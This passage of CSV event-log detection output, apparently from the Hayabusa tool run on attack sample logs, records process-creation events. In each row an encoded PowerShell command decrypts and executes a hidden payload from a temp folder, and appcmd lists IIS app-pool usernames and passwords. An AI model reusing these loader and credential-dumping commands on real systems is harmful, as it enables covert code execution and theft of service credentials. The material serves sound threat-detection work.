dwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 560 | PGUID: 365ABB72-3D6D-5CEB-0000-0010C47BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.971 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3196 | PGUID: 365ABB72-3D6D-5CEB-0000-00108C7FFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.041 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2472 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C83FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.121 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2896 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C87FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.202 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2524 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC8AFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.282 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3144 | PGUID: 365ABB72-3D6E-5CEB-0000-00108C8EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 